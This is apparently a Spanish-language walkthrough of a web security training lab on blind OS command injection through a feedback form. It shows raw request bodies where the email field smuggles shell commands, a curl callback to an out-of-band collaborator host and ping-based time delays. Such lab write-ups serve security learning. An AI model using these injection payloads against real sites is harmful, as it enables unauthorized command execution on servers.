Blind OS command injection with time delays
![[20251009010208.png]](/assets/20251009010208.C1sA83u7.png)
![[20251009010400.png]](/assets/20251009010400.Bw6EKdRQ.png)
En el sitio web encontraremos un apartado de enviar nuestro feedback.
![[20251009011004.png]](/assets/20251009011004.DFndToYF.png)
Interceptando el trafico observaremos que en el parámetro de email podemos agregar un ; y ejecutar comandos.
![[20251009011103.png]](/assets/20251009011103.vYd70Gvf.png)
c
csrf=n1NAqaPZoDt3XaiPjallzCIsrVLAycOT&name=test&email=test%40test.com;curl%20http://2ps71xp4hg4i31z7ipf93crv1m7dv3js.oastify.com&subject=test&message=test![[20251009011124.png]](/assets/20251009011124.CB9fqfY_.png)
Para poder solucionar el laboratorio y que tenga un delay de 10 segundo debemos enviar un ping con cierto paquetes, en mi caso envía 10 paquetes.
c
csrf=n1NAqaPZoDt3XaiPjallzCIsrVLAycOT&name=test&email=test%40test.com;ping+-c10+127.0.0.1;&subject=test&message=testTambién funciona cuando le agregamos ||
c
csrf=n1NAqaPZoDt3XaiPjallzCIsrVLAycOT&name=test&email=test%40test.com||ping+-c10+127.0.0.1||&subject=test&message=test